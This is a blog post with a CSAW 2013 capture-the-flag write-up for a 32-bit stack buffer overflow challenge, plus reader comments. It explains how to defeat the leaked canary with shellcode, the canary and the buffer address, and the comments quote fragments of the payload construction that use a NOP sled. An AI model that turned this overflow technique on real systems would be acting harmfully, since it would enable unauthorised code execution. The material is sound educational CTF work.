Monday, September 23, 2013

CSAW 2013 Exploit 200



Credit to Ryan

The first thing we did for this challenge was to look at the program headers:



From the headers we can see that the stack is given read, write, and execute permission therefore assuming the stack has enough space and we can overflow the buffer, we should be able to place and execute shell code on the stack. Looking at the assembly in IDA pro we see a few interesting lines.




From the assembly we can calculate what the stack will look like at run time:



As we can see the assembly the program is going to do the following:
1.      Create a random canary value and save it into VAR_C
2.      Send the address that tops to the top of BUF
3.      Send the canary value
4.      Send the following string “Welcome to CSAW CTF.  Exploitation 2 will be a little harder this year.  Insert your exploit here:”
5.      Receive 4096 bytes and store them in BUF
6.      If the canary value has not been changed return else exit the program
So the program is reading up to 4096 bytes into a 2048 byte buffer. We have a known address that points to the top of the buffer and we have the canary value. So we need to write an exploit program that will send the shellcode + canary value + buf address to get the flag.

Flag = 53666e040caa855a9b27194c82a26366

key{53666e040caa855a9b27194c82a26366}

4 comments:

  1. Hello, I am new in exploit tasks, I try to solve this challenge, but my exploit code excellent work on my local computer and bind shell to 127.0.0.1 port 11111. But when I sent code to remote server my code not work.
    I try to understand what is wrong
    I get shell codes from http://shell-storm.org/ instead of developing own
    try all tcp shell codes most of them correctly work on my local computer but on remote server not work

    Do you use your own developed shell code?
    Given elf file is x86 32 bit my local computer is Ubuntu 32 bit
    I think server os should be compatible

    Also I read your python file and see that string:

    # Create NOP sled
    nop_sled = '\x90' * (BUFF_SIZE - len(shellcode) - len(PAD) )

    # Expoit to send to server
    exploit = nop_sled + shellcode + PAD + canary + filler + buf_address

    why you add nop string?

    my code was like
    exploit = shellcode + CalculatedPadding + canary + 12bytepadding+ buf_address

    after ret instruction EIP is on start of shellcode why you add additional padding with NOPs?

    ReplyDelete
  2. Why problem make when you no problem have you don't want to make.

    ReplyDelete
  3. My main question is :

    why you add nop sled?

    # Expoit to send to server
    exploit = nop_sled + shellcode + PAD + canary + filler + buf_address


    after ret instruction EIP is on start of shellcode why you add additional padding with NOPs?

    ReplyDelete
  4. Hello, I don't know if this blog is still alive however I want to know why there is a 12-byte padding after the canary(before the ret address.) Why is that? Can anyone please explain? Thanks.

    ReplyDelete